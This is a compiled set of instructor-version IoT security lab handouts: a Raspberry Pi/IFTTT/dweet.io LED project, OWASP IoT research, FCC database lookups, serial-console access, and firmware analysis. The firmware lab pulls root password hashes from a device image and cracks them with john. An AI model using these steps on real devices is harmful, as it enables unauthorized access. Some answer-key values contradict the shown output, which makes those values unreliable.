through changing the LED that is lit. Also try changing the time that the LEDs are lit in each cycle.
What did you change in the code to make change the number of times that the LEDs cycle?
____________________________________________________________________________________
In Code cell 3, the value passed to the range() function in the for i in range(2): statement.
What did you change in the code to change the time that the LEDs were lit in each cycle?
____________________________________________________________________________________
In code cell 3, the values in one or both of the time.sleep() methods.
If the circuit were attached to different pins on the Pi, what in the code would need to be changed?
____________________________________________________________________________________
In Code Cell 2, the values assigned to the GreenLEDPin and RedLEDPin variables.
Part 2: Create an IFTTT app

As you may remember from IoT Fundamentals Connecting Things lab 5.3.4.4, IFTTT (If This Then That) is a
simple web service that allows the connection of an event to an action. For example, an event, such as a
sensor in the home reaching a threshold value, could be configured to trigger a phone call or text to a
provided smart phone number. This very simple logic can create very rich functionality.
In this lab, we will use an IFTTT widget to detect a button press on a smart phone or tablet. IFTTT will then
trigger a post to a website called dweet.io that serves as a very simple "message broker."
dweet.io allows a user or application to post a message to a website that can then be retrieved by another
application. This is done by creating a "thing." A thing is a virtual object that holds messages. By referring to
the name of the thing in a URL, you can send a message. Similarly, a request can be made to the thing that
allows retrieval of the message by any device that knows the name of the thing. This is useful because these
messages allow different applications to communicate with one another by using the thing as an intermediary.
In a later part of the lab, the Raspberry Pi will detect whether a message has been posted to the thing by a
tap on the IFTTT button widget that has been installed on a smart phone. If a new button tap is detected, the
Pi will actuate the circuit by changing the LED that is lit from green to red or vice versa.
Step 1: Register a free user account at IFTTT

a. Go to the IFTTT website.
b. If you do not have an IFTTT user account, click Sign up to register for free. A valid email address is
required to register a free user account.
Step 2: Create the IFTTT App

a. After signing up and authenticating with your account, Click My Applets.
b. Click the Services tab and then click New Applet.
c. Click the blue +this text to select the service that will trigger an action as shown in the figure.
d. In the Search services field, enter button and then click the Button widget tile that appears.
e. Click Connect. On the Choose trigger page, click the Button widget tile.
f. Click the blue +that text to select the action that will be triggered by the Button widget.
g. Type webhooks into the search services field and click the Webhooks tile to select this service as the
action that will be triggered.
h. We now need to enter in the URL of the dweet thing that will receive a message sent by the Button
Widget. First, we need to create a name for our thing. The name should be unique in order to make sure
that only messages posted by you will received by the thing. The name of the thing can contain no
spaces but can be hyphenated. Keep the name of your thing private. There is no account-based security
on dweet.io. We did not even need to register!
Click in the URL field of the Make a web request interface. Enter the following URL by substituting the
name your thing where indicated. Do not include the {} characters in the URL.
https://dweet.io/dweet/for/{my-thing-name}?text=mydweet
Students will benefit from exploring the dweet.io functionality and API. There is interactive documentation
that allows students to explore various dweet.io functionalities and API concepts. For the sake of brevity,
this material is not covered in this lab.
i. Click Create action to create and Finish to save your app. Your completed applet should look like this:
That is it! This is all that you need to do to create the IFTTT app. The other fields on this screen can be left
unchanged.
Part 3: Download and Configure the IFTTT app on a Smart Phone

Now that the IFTTT applet has been created, create a widget on a smart phone that will control the LED
circuit. The widget will consist of a single button that looks like an icon for a smart phone application. To do
this, install the IFTTT app on the smart phone and then use it to install the applet as a widget.
a. From the Apple Store or Google Play Store, search for, download, and install the IFTTT app onto the
smart phone. The IFTTT app requires iOS 9.0 or higher, and Android devices running version 4.1 or
higher.
b. Install the IFTTT app.

c. In the app, locate the sign in link and sign in with your username and password. You may be prompted to
allow the app to user your locator service. This is not necessary.
d. Tap the My Applets icon at the bottom right of the IFTTT app screen. You will see your applet there.
e. Tap the gear icon in the upper right-hand corner of the applet screen and select Widgets.
f. Find your button widget and verify that it is turned on.
g. To add the button widget to your home screen follow the directions that are appropriate for your device.
For Android 4.1 and higher revisions:
1) Go to the device home screen.
2) Press an empty place on the home screen until the home screen configuration menu appears below
the views of the available home screens.
3) Scroll through the available widgets until you find the IFTTT widgets.
4) Tap and hold the IFTTT Small option. You will return to the home screen views. Move to the home
screen that you want to add the widget to and tap the location at which you want to place the widget
icon.
5) You will be returned to the IFTTT app. Tap the widget that you want to add to the selected location.
6) You should now be returned to the home screen and your widget will appear there.
For Apple iOS versions 9.0 and higher.
1) Swipe right over the Home screen to bring up the notification screen.
2) Scroll to the bottom of the screen and tap Edit.
3) Find the IFTTT App and tap the "+" symbol.
4) To finish, tap Done.
Part 4: Program the Raspberry Pi to Work with the App

Complete the code that will allow your Raspberry Pi to detect button pushes that have been sent from the
phone using the IFTTT webhook applet. To do this, you will first initialize an LED on the Raspberry Pi. The
Raspberry Pi will then start to continuously poll the dweet.io thing that was created. The code will compare
the timestamp of the last dweet message received by the thing to the timestamp of the most recent dweet
message. If the timestamps differ, a new button push has been detected. The LED that is lit will turn off and
the other LED will turn on.
Step 1: Prompt the User to Choose an LED to Light

Run the code cells. It is not necessary to run the code that tests your circuit unless you need to verify that the
circuit still works and can be controlled from the Pi.
#Code Cell 4.
while True:
# Asks the user to select the LED. Put the response into a variable.
lit = input("Which LED should be lit? (r)ed or (g)reen? (q) to quit: ")
# convert the input to lowercase and put it in another variable.
lit1 = lit.lower()
#Set the LED state based on the user input
if lit1 == "r": #If the user chose the red LED
GPIO.output(GreenLEDPin, False) # False = set 0V on the pin

GPIO.output(RedLEDPin, True) # True = set 3.3V on the pin
break
elif lit1 == "g": #If the user chose the green LED
GPIO.output(GreenLEDPin, True) # True = set 3.3V on the pin
GPIO.output(RedLEDPin, False) #False = set 0V on the pin
break
elif lit1 == "q": #If the user chose to quit the program
break
else: #If the user entered something other than r, g, or q.
print("Please enter r for red, g for green, or q to quit.")
Step 2: Post to your dweet thing at dweet.io.

In this code cell, we will use a special module called dweepy to send messages to a thing at the dweet.io
website.
Create a string variable to hold the name of your dweet thing. The name must match the name you use in
your IFTTT widget exactly. Set the value of the myThing variable to your dweet thing name.
#Code cell 5
#===================
myThing = "your_thing_name" #Add value: add you dweet thing name
#===================
old_dweet = dweepy.dweet_for(myThing,{"dweet": "1"}) #this function sends

data to dweet.io
old_created = old_dweet['created'] #get the time stamp of the first dweet
print(old_created)
Step 3: Monitor dweet.io to detect a new button push.

Now, the system needs to monitor the status of the thing on dweet to determine if it has received a button
push from the IFTTT button widget. dweet things have several different default properties that you can read
from the dweet.io website. One of these is the timestamp of the last time the thing was posted to.
We set a variable that holds the timestamp. The code uses a while loop to get the timestamp from the dweet
thing every second. It compares the value of the previous dweet timestamp, which is held in the old_created
variable, to the value of the timestamp for the latest post to the thing. If the timestamps do not match, it is
assumed that a button was pushed on the smart phone.
If a new button push is detected, the currently lit LED is turned off, and the other LED is turned on.
This code uses an endless loop. To stop execution, press the execution button. Some error text may appear
as output below the code cell. This is normal.
#Code cell 6.
counter = 0
while True:
new_dweet = dweepy.get_latest_dweet_for(myThing) #get latest dweet
new_created = new_dweet[0]["created"] #put the created value of the

lastest dweet into a variable
if new_created != old_created: #check to see if the the old dweet is
different from the new dweet
counter += 1
print(str(counter) + " New dweet detected!",end='\n')
old_created = new_created
if lit1 == "g":
print("Activate red LED")
GPIO.output(GreenLEDPin, False) # False = set 0V on the pin
GPIO.output(RedLEDPin, True) # True = set 3.3V on the pin
lit1 = "r"
elif lit1 == "r":
print("Activate green LED")
GPIO.output(GreenLEDPin, True)
GPIO.output(RedLEDPin, False)
lit1 = "g"
time.sleep(1)
Part 5: Use the IFTTT app on the smartphone to trigger an event on the
Raspberry Pi
Make sure the smart phone has Internet connectivity, either by Wi-Fi or cellular data. The connection can be
either Wi-Fi or cellular data. Using cellular data will prove that the circuit can be controlled from anywhere that
has cellular data coverage.
a. Run the code cells. It is not necessary to run Code Cell 3 unless you need to verify that the circuit still
works and can be controlled from the Pi.
b. When prompted, initialize an LED when the code cell is run by selecting the color that should be lit.
c. After running the last code cell, the Raspberry Pi will be continuously monitoring the dweet.io thing in
order to detect a new button push. On your smart phone, tap the IFTTT button widget. After a brief delay,
the LED that is illuminated will change. Try this several times and observe the circuit.
Congratulations! You have created your own end-to-end IoT system.
Reflection
1. This system is not terribly exciting but can serve as a model for much more interesting IoT systems. Choose
an IoT sector and imagine a device that could be actuated by a system like this (instead of, or in addition to,
the LEDs). What are the security implications if a hacker was able to take control of the system?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. This system could serve as a metaphor, most obviously, of a home automation application
that interacts with a home IoT device such as a light switch or other device that can be turned on or off. With a
little additional imagination, the system could be seen as a wirelessly controlled medical device, power grid
switchgear, or even the flood gates on a dam.
2. Create a diagram of the system or use the one above. Label each element of the diagram with the layer of the
simplified IoT model that it belongs to.
3. What elements of this system make up its attack surface? List all the elements which are potentially
vulnerable to a cyberattack. What kinds of attacks are possible? Answer in the table below or create your own
table. Think of system in terms of the roles of elements. Rather than "Raspberry Pi" for example, think of
"Controller (Raspberry Pi)"
Layer Attack Surface Vulnerability
physical tampering, removal of SD card,

Raspberry Pi (controller) disconnecting from network.
Device
loss, unauthorized access to password

protected apps
smart phone
possible interception or disruption of signal

cellular data connection
Communication
sniffing, password interception, unauthorized

device takes control of system, traffic to dweet
local network connection is not encrypted
credential theft, manipulation of data

Application web application
unauthorized use of app

smart phone app
Lab – Investigating IoT Security Requirements (Instructor Version)
Objectives
In this lab, you will learn about IoT security requirements by investigating OWASP critical IoT security
vulnerabilities.
• Investigate OWASP.
• Investigate the OWASP IoT Top 10 Vulnerabilities.
• Investigate Vulnerabilities, Vulnerability Assessment, and Mitigation Measures.
In this lab, you will review a list of the top 10 IoT security vulnerabilities as documented by the Open Web
Application Security Project (OWASP). These vulnerabilities are generic weaknesses in IoT devices,
communications, or applications that can be exploited by threat actors. The vulnerabilities are directly related
to the IoT security requirements.
Instructor Note: The purpose of this lab is for students to begin thinking about how the critical security
requirements for IoT systems relate to specific vulnerabilities. The OWASP Internet of Things Project is a
valuable resource for learning about IoT security. Although some things discussed in it are beyond the scope
of this course, familiarity with the OWASP resources will help students continue in their learning about the IoT
security topic.
Required Resources
• PC with Internet access
Step 1: Investigate OWASP.

a. Visit the home page for The OWASP Foundation.
What is the purpose of the OWASP foundation?
____________________________________________________________________________________
____________________________________________________________________________________
OWASP is a foundation that that is dedicated to driving visibility and evolution in the safety and security of
the world’s software.
b. Visit the OWASP Internet of Things Project page.
c. Explore the resources that are available on the page and the tabs at the top of the page to answer the
following questions.
What is the purpose of the OWASP IoT Project?
____________________________________________________________________________________
____________________________________________________________________________________
It is designed to help manufactures, developers, and customers understand the security issues
associated with creating or purchasing IoT devices.
For what specific IoT use cases does OWASP offer recommendations?
Lab - Investigating IoT Security Requirements
____________________________________________________________________________________
____________________________________________________________________________________
OWASP offers guidelines for medical and manufacturing (ICS/SCADA) IoT use cases.
Look at the IoT Event Logging Project tab. Give three examples of the security events that OWASP
recommends should be logged.
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. Students will not understand all of this, however, they should pick out a few things that
make sense to them, such as high rate of password attempts, traffic from unenrolled systems, device
case tampering, and device entered administrative mode. Encourage students to research and discuss
events that are new to them.
Step 2: Investigate the OWASP IoT Top 10 Vulnerabilities.

Vulnerabilities are weaknesses in IoT systems that can be exploited by threat actors in various types of
attacks. The goal of IoT security is the identification of vulnerabilities in system components before they are
selected or deployed and during the operation of the IoT system. In 2014 OWASP collected the top 10 IoT
vulnerabilities and documented how to identify and address the vulnerabilities. Although this list is due to be
updated, it is still useful very for understanding IoT security.
a. Go to the OWASP IoT Top 10 Vulnerabilities page. Click several vulnerabilities in the list. Look at the
linked page. What information is provided for each vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Each vulnerability has a page that gives information about who might pose a threat, features of potential
attacks and the security weaknesses and impacts. In addition, there are questions that can be used to
assess system elements for the vulnerability and suggestions for addressing the vulnerability.
b. What is the first vulnerability? What needs to be checked to determine if this vulnerability is present in a
system?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
In the 2014 version of the top 10, the first vulnerability, 2014-I1 is Insecure Web Interface:
o Determine if a system has this vulnerability
o Determine if the web interface allows the username and password to be changed and if there is an
account lock out feature
o Attempt password recovery to see if account validity can be determined
What are some of the things that can be done to verify that an IoT web interface is secure?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Lab - Investigating IoT Security Requirements
Default passwords and usernames are required to be changed after initial setup. Password recovery
mechanisms do not verify to an attacker that a username is valid. For example, an attacker can enter a
random username at the interface and click "Forgot Password." The web frontend should require entry of
additional information, such as an email address as part of the recovery process. If the email address is
unknown to the system, then an error message is posted and the process will not continue. In addition,
passwords should be strong, account lock out should be implemented, and no passwords should be
transmitted in clear text.
Step 3: Investigate Vulnerabilities, Vulnerability Assessment, and Mitigation Measures

Become familiar with the features of some of the other OWASP IoT Top 10 vulnerabilities.
Work in the table below, or in your notebook using the table as a guide. Investigate the other top 10
vulnerabilities. Select three and complete the table below. List the vulnerability, some of the vulnerability
assessment questions, and some of the mitigation techniques for each.
Note: You are not expected to understand all of the information provided for each vulnerability. However, you
should understand enough to provide a few entries for at least three of them. Take time to research some of
the things that you don't currently understand, if possible.
Vulnerability
Assessment
Mitigation
Lab – Investigate the FCC Database (Instructor Version)
Objectives
Use the Federal Communications Commission (FCC) database to view information about various IoT devices
that utilize radio frequencies for data transmission. The database has information that could benefit both the
user and a potential attacker.
Part 1: Search for Information by FCC ID
Part 2: Search for Information using the Advanced Search
IoT devices often use wireless technologies to communicate with various equipment including other IoT
devices. The FCC requires companies that develop devices that use any form of radio frequency for
transmission to register those devices and provide supporting information about the particular device. Tests
must be performed to make certain that the devices conform to the rules established by the FCC. The FCC
requires that device manufacturers visibly display their FCC ID on the device.
Required Resources
Part 1: Search for Information by FCC ID
Step 1: View device information by using the search feature.

a. Use the following link to access the FCC database search function:
https://www.fcc.gov/oet/ea/fccid
b. The search fields include a grantee code and a product code. The grantee code is either a 3 character or
5 character code stamped on the device. The example used here has the ID printed on the label as FCC
Lab – Investigate the FCC Database
ID: JNZYR0019. Because the ID provided does not specify how the number is separated attempt to put
the first 3 characters in the Grantee Code text box and the remaining characters in the Product Code
text box. Click the Search button. How many entries were displayed?
____________________________________________________________________________________
There is one entry displayed at the time this lab was written.
What is the Applicant Name that is displayed?
____________________________________________________________________________________
Logitech Far East Ltd
What other columns of information are available?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
View Form, Display Exhibits, Display Grant, Display Correspondence, Applicant Name, Address, City,
State, Country, Zip Code, FCC ID, Application Purpose, Final Action Date, Lower Frequency in MHz,
Upper Frequency in MHz.
c. Click the Summary link under the Display Exhibits column. Which Exhibit Types are marked as
Permanent Confidential?
____________________________________________________________________________________
Block Diagram, Operational Description, Schematics
d. Click the back button in your browser. Click the Detail link under the Display Exhibits column. A warning
message displays informing you that the FCC does not guarantee the documents to be virus-free. If you
have a current anti-virus application in place and have reason to trust the entity click OK to accept the
warning. What Exhibit Types are available?
____________________________________________________________________________________
____________________________________________________________________________________
Cover Letters, External Photos, ID/Location Info, Internal Photos, Test Report, Test Setup Photos, Users
Manual
e. Click the Test Report attachment. Scroll down to page 6 to display the General Information. What is the
Product that is displayed?
____________________________________________________________________________________
2.4GHz Cordless Keyboard
What information is displayed about the Antenna Type?
____________________________________________________________________________________
PCB printed antenna with 1.41dBi antenna gain
f. Scroll to the next page. How many channels are listed in the table? ______________________________
Channels 1-12
What is the frequency range? What technologies use this frequency range?
____________________________________________________________________________________
2405-2474Mhz, Bluetooth and WiFi both use this range. This range is part of the Industrial, Scientific and
Medical (ISM) radio bands.
g. Close the Test Report attachment. Click Internal Photos document. Scroll through the document, what
kind of photos are displayed?
____________________________________________________________________________________
A breakdown of the parts and components in the keyboard.
Is there a potential for an attack with this device? Please explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Given the keyboard uses Bluetooth it could be possible for an attacker to capture data transmitted. It
would also be possible for an attacker to modify the keyboard in some fashion to capture is being typed
without the users knowledge. This could possibly be achieved by implanting some kind of recording
device that makes use of the SPI_MOSI and SPI_MISO pins inside the keyboard. This keyboard could be
used on many types of IoT devices.
Step 2: Search for information on a second device

a. Return to the FCC ID search screen. Enter the FCC ID: A3L-WIS09ABGN2. You may need to get creative
on the entry in order to retrieve the information. Attempt to use the 3 or 5 character code. Pay attention to
the message following the Product Code prompt. How many entries were returned? (Hint: Hyphen (-) is
significant.)
____________________________________________________________________________________
____________________________________________________________________________________
There were 10 displayed at the time this lab was written.
b. Select one of the entries dated 8/20/2009. Click the Detail link. Click the link for Test Report 1. What is
the equipment type? What is the model number and who is the applicant?
____________________________________________________________________________________
____________________________________________________________________________________
Equipment: Wireless LAN adapter, model: WIS09ABGN2, Applicant: Samsung Electronics
c. Scroll to Section 2 General Information. Based on the information in the Product Details and Table for
Filed Antenna, which wireless standards are supported?
____________________________________________________________________________________
____________________________________________________________________________________
802.11a, 802.11b, 802.11g, 802.11n
d. Close the Test Report 1 document. Open the Internal Photos document. Scroll down to page C8 of C9.
What chip is displayed? Why might this information be useful?
____________________________________________________________________________________
RaLink RT3572L, it could be beneficial in locating a driver.
Part 2: Search for Information using the Advanced Search

It is possible to search for devices within the FCC database without knowing the FCC ID. This part of the lab
will offer some advice on narrowing the search pattern for more precise results.
Step 1: Search for a device without the FCC ID

In this search you will see what information is available for a Nest thermostat prior to purchasing one.
Return to the FCC ID search form. Click the Advanced Search button at the upper right of the dialog.
a. In the Applicant Name text box type Nest and then click Start Search near the bottom of the form. How
many items were returned?
____________________________________________________________________________________
There were 134 items at the time this lab was written.
b. With the large number of entries that were returned it would be best to provide a few more parameters.
Return to the previous search screen by clicking the back button in your browser. Add the following
search parameters:
1) Final Action Date Range (mm/dd/yyyy) 09/01/2016 to 04/30/2018
2) Application Purpose: Original Grant
3) Product Description: thermostat
How many items were returned?
____________________________________________________________________________________
There were 7 items returned at the time this lab was written.
Select Details on any of the entries. How many documents are displayed for the thermostat?
____________________________________________________________________________________
There were 12 documents returned at the time this lab was written.
Why are there multiple test reports?
____________________________________________________________________________________
____________________________________________________________________________________
The thermostat is capable of communicating using multiple protocols. The protocols tested are WLAN
(WiFi), BLE (Bluetooth Low Energy), and Zigbee.
Reflection
1. How could the information available in the FCC database be valuable when attempting to secure IoT devices?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. The primary areas to note would be the potential schematics and communication protocols.
2. How could the information available in the FCC database be valuable to an IoT attacker?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. Using the same information, we are attempting to secure areas that attackers are trying to
exploit.
Lab - Compromise IoT Device Hardware (Instructor Version)
Topology
Raspberry Pi Pinout Diagram
Lab - Compromise IoT Device Hardware
Objectives
Perform threat modeling activities to evaluate IoT device hardware and firmware.
Part 1: Accessing the Raspberry Pi with Serial Interface
Part 2: Disabling Serial Login Access to Raspberry Pi
This lab will demonstrate how an IoT device may be compromised by physically connecting to the device
using communication protocols other than Ethernet. A Raspberry Pi could be used for controlling and
monitoring many types of equipment. It is important that security is in place at the forefront when configuring
and positioning these types of devices. The last part of the lab demonstrates how to secure against these
compromises.
The lab makes use of a variant of the RS-232 serial communication standard that has been used since the
1960’s to communicate between various types of equipment.
Please note the use of a special cable being used to connect the Raspberry Pi to the PC serial port.
Even though some PCs still have conventional RS-232 COM ports it is imperative that direct
connections from those pins are not made directly to the Raspberry Pi. The Raspberry Pi uses +3.3v
for the serial pins whereas the RS-232 specification indicates voltages up to +13v.
There are other possible methods for reducing the voltage given the header connections on the Raspberry Pi
and many other IoT type devices this provides the simplest way to accomplish serial connectivity.
Required Resources
 PC with IoTSec Kali VM and terminal emulation software, such as PuTTY
 adafruit - USB TO TTL SERIAL CABLE - DEBUG / CONSOLE CABLE FOR RASPBERRY PI or
compatible cable – adafruit PRODUCT ID: 954 (similar to the one pictured below)
Note: When purchasing a compatible cable look for those using either the Prolific or SiLabs Chipset. Make
certain to read the reviews when purchasing a compatible cable to verify compatibility with the Raspberry Pi.
It is important that the output voltage be +3.3v.
Part 1: Accessing the Raspberry Pi with the Serial Interface

This part of the lab will create a TTY connection to the Raspberry Pi using a USB to Serial Cable connected
to the serial pins on the Raspberry Pi header.
Step 1: Set up the topology.

a. Start the IoT Security lab topology with Kali VM and Raspberry Pi connected physically via an Ethernet
cable.
b. Log into Kali VM to start the DHCP server.
c. Open a web browser in the Kali VM or your host PC and navigate to the IP address for your Raspberry Pi.
d. Using the pinout diagram above or refer to the diagram at https://pinout.xyz, locate the Raspberry Pi pins
listed in the following table.
USB to Serial Wire Raspberry Pi Pin
Black 6 - Ground
White 8 - Transmit
Green 10 - Receive
Red Unused
e. After locating the necessary pins, power off the Raspberry Pi until instructed to power it up again.
(pl-app) root@myPi:/home/pi/notebooks# shutdown -h now
f. Unplug the Raspberry Pi from the power source. With the Raspberry Pi turned off, connect the USB to
Serial Cable to the pins listed in the above table on Raspberry Pi.
Step 2: Configure software – Windows (skip this step if using Linux)

a. Install the driver for the adafruit USB to TTL Serial Cable as documented at
https://www.adafruit.com/product/954 for the cable from adafruit and follow the directions provided by the
vendor.
b. When complete, plug in the USB to TTL Serial Cable to a USB port on the PC.
c. Navigate to the Device Manager to determine the COM port assigned to the USB to Serial connection. In
this example, Prolific USB-to-Serial is using COM3.
d. The following settings will need to be defined for connecting to the Raspberry Pi using the console port.
Description Settings
Port COM port used as indicated in Device Manager

Baud Rate 115200
Data bits 8
Stop bits 1
Parity None
Flow control None
For example, in PuTTY session screen, select the Serial radio button, input the COM port listed in the
Serial line box matches the COM port determined in Device Manager and the correct Baud rate is
specified.
Expand Connection and click Serial to verify all the options are configured according to the above table.
Click Open to start the terminal session to the Raspberry Pi. PuTTY is waiting for output from the
Raspberry Pi or input from the keyboard.
e. Power up the Raspberry Pi. Output from the Raspberry Pi should start scrolling across the screen as
shown below.
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Linux version 4.14.30+ (dc4@dc4-XPS13-9333) (gcc version 4.9.3
(crosstool-NG crosstool-ng-1.22.0-88-g8460611)) #1102 Mon Mar 26 16:20:05 BST 2018
[ 0.000000] CPU: ARMv6-compatible processor [410fb767] revision 7 (ARMv7),

cr=00c5387d
<Some output omitted>

Welcome to the Chestnut Platform!
Version: 2.1
IP: 203.0.113.11
myPi login:
What version and type of operating system is displayed in the output?
____________________________________________________________________________________
Linux version 4.14.30+
What type of processor is being used?
____________________________________________________________________________________
CPU: ARMv7 Processor +
f. Log in using the credential for the user pi configured for your Raspberry Pi in a previous lab.
Step 3: Configure software – Linux (skip this step if using Windows)

a. On a Linux platform (your host PC) determine the port to use by listing the tty ports in the /dev folder.
user@computer ~ $ ls /dev/ttyUSB*
b. Assuming the USB tty port is USB0, access the USB to Serial connection by typing the following:
user@computer ~ $ screen /dev/ttyUSB0 115200
c. Power up the Raspberry Pi. Output from the Raspberry Pi should start scrolling across the screen as
shown below.
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Linux version 4.14.30+ (dc4@dc4-XPS13-9333) (gcc version 4.9.3
(crosstool-NG crosstool-ng-1.22.0-88-g8460611)) #1102 Mon Mar 26 16:20:05 BST 2018
[ 0.000000] CPU: ARMv6-compatible processor [410fb767] revision 7 (ARMv7),
cr=00c5387d
<Some output omitted>

Welcome to the Chestnut Platform!
Version: 2.1
IP: 203.0.113.11
myPi login:
What version and type of operating system is displayed in the output?
____________________________________________________________________________________
Linux version 3.18.11-v7+
What type of processor is being used?

____________________________________________________________________________________
CPU: ARMv7 Processor +
d. Login to the Raspberry Pi using the user pi and password configured for your Raspberry Pi.
Part 2: Disabling Serial Login Access to Raspberry Pi

If the Raspberry Pi is intended to be collecting sensitive information, and there is any possibility of physical
access to the device, it is probably best to disable login access through the serial line.
Step 1: Connect to the Raspberry Pi through the console

It will be necessary to get a console connection to the Pi either through a direct cable connection or through
the PL-App console. Login using the credentials for the user pi as defined for your particular device.
a. After the connection is established, modify the Raspberry Pi configuration using the following command:
pi@myPi$ sudo raspi-config
b. Depending on your Raspberry Pi version, select Interfacing Options -> Serial and press Enter or select
Advanced Options -> Serial and press Enter.
c. Select <No> for the question "Would you like a login shell to be accessible over serial?" and press Enter.
d. Select <Yes> for the question "Would you like the serial port hardware to be enable?" and press Enter.
e. On the next screen, verify that the login shell is disabled and serial interface is enabled. Press <OK> to
continue.
f. Select <Finish> to exit the configuration window.
g. Reboot the Raspberry Pi when prompted. If not, enter the command sudo reboot at the prompt to reboot
the Raspberry Pi. Then watch the output in the terminal application window.
$ sudo reboot
Step 2: Attempt to reconnect with the serial connection

a. After the rebooting process is finished, the Raspberry Pi should no longer display a command prompt in
the terminal application. This port may now be used to communicate with other devices for data
collection. If there are any connections to the serial port, it is important that they be protected because
anyone with the appropriate cable could connect to the device and exfiltrate data.
b. In the Kali VM or the host PC, navigate to the web page of the terminal window of the PL-App for your
Raspberry Pi.
c. To simulate data being transmitted from the IoT device, create a Python script by pasting the following at
the prompt at the terminal of the PL-App.
Enter the command cat > comout.py at the prompt.
(pl-app) root@myPi:/home/pi/notebooks# cat > comout.py
At the cursor, paste the following script:
#!/usr/bin/env python
import time
import serial
ser = serial.Serial(
port='/dev/serial0',
baudrate = 115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=1
)
counter=0
for counter in range(9):

ser.write(b'Write counter: %d \r\n'%(counter))
time.sleep(2)
d. After pasting the script into the terminal window, press CTRL-D to close the file.
e. Issue the command python comout.py at the prompt.
(pl-app) root@myPi:/home/pi/notebooks# python comout.py
f. Navigate to the terminal application (PuTTY).
Notice how the output can be read on the terminal. The terminal pauses 2 seconds between each time
output is written to the screen as instructed in the Python script.
Reflection
1. Knowing what you know so far, do you think it would be possible to connect two Raspberry Pi devices
together using the serial pins? If so, how?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
It would be very easy to do. Simply use a jumper wire connecting the Tx pin on Raspberry Pi #1 to the Rx pin
on Raspberry Pi #2 and the Rx pin on Raspberry Pi #1 to the Tx pin on Raspberry Pi #2. Because both
devices are using +3.3v, there would be no other conversion necessary. Both Raspberry Pi devices could
have their serial ports disabled for login and the terminal emulation software set and the same baud rate in
order to communicate. It may be necessary to download the ‘screen’ application using ‘apt-get install screen’
on the Raspberry Pi. It would also be possible to leave the serial login enabled on Raspberry Pi #1 and
connect to Raspberry Pi #2 using the ‘screen’ application and logging in.
2. What kind of information might you need to know in order to capture the data coming out of the serial port of
an IoT device?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
In order to capture data, it would be necessary to know the baud rate, stop bits, parity, and flow control
settings on the IoT device. The baud rate could be determined through trial and error using the common baud
rates. (ie. 2400,4800,9600,19200…..115200)
Lab – Compromise IoT Device Firmware (Instructor Version)
Objectives
Part 1: Performing Threat Modeling Activities to Evaluate IoT Device Firmware
Part 2: Reflection and Discussion of Threats to IoT Device Firmware
IoT devices are susceptible to attacks like many other Internet connected devices running an operating
system. In the past, hackers have taken over smart home devices including security cameras, refrigerators,
ovens, air conditioners, and even vehicles while they were driving. IoT devices with cameras can potentially
be used as spying devices within one’s home. Many popular IoT devices run Linux as their OS.
Vulnerabilities with device firmware include, but are not limited to: key handling vulnerabilities, hard coded
passwords, default username/passwords, clear text password transmission through WiFi, buffer overflow
attacks, distributed denial of service attacks, and firmware modification attacks.
This lab will require students to download a device firmware binary file and decompress/decode it to its file
system and kernel components. Students will be required to analyze the firmware and investigate how
vulnerabilities can be exploited.
In this particular lab, we will be exploring an IoT device’s firmware file by using a wide variety of
tools/commands on a Kali Linux virtual image.
Required Resources
 Laptop or PC running Oracle Virtual Box with a virtual image of Kali Linux loaded
 Internet connection
Part 1: Performing Threat Modeling Activities to Evaluate IoT Device

Firmware
Step 1: Set up the environment and open a terminal window.

a. Start the IoTSec Kali VM and log in using username root and password toor.
Note: If the Kali Linux machine has not been installed, please refer to a previous lab in this course.
b. Open up a terminal window.
Step 2: Crack root password using john.

a. Issue the strings command on the rootfs.ext2 file system and search for “root” to see if there are any
password entries. This file is essentially an image file that could be written directly to a drive and booted
up using the appropriate hardware. We will look for “root:$” which is how a typical entry would appear in
the shadow file, and then save it to a temporary file in the /tmp directory. However, when we filter for
“root:$” using the ‘grep’ command, we have to delimit the “$” with two backslashes (\\) because the $ has
a special meaning in the command.
Lab – Compromise IoT Device Firmware
Note: The Linux prompts in the examples of this lab have been shortened to just #, indicating that you
have root access.
# pwd
# cd /root/lab_support_files/emulated/mips32
# strings rootfs.ext2 | grep root:\\$ > /tmp/passwd
# more /tmp/passwd
b. Run john on the file /tmp/passwd to crack the password.
# john /tmp/passwd
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-
smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
<some output omitted>
Use the "--show" option to display all of the cracked passwords reliably
Session completed
You could also use the show option to display the cracked passwords.
# john --show /tmp/passwd
What is the root password? ________________________________________________________ device
Step 3: Extract the IoT device firmware binary file into a new directory.
a. Change directories to the IoT device firmware file:
# cd /root/lab_support_files/firmware
b. List the content of the folder and obtain the name of the firmware file:
# ls -l
c. The following command will extract the file system from the firmware and will allow you to navigate and
explore anything that can be targeted as a potential vulnerability:
# binwalk -e iotdev_firmware.bin
What is the file system type? _____________________________________________________ squashfs
Step 4: Examine the output of the binwalk command.

a. What is the significance of this file system type? Do a web search to find more information.
____________________________________________________________________________________
____________________________________________________________________________________
squashfs is a compressed file system for Linux where low overhead is needed.
b. Verify what new subdirectory was added:
# ls -l
What was the name of the new directory that was added?
____________________________________________________________________________________
_iotdev_firmware.bin.extracted
c. Change into this new directory:
# cd _iotdev_firmware.bin.extracted
What is the name of the new directory within this subdirectory? What command did you use to determine
that?
____________________________________________________________________________________
____________________________________________________________________________________
squashfs-root, ls -l
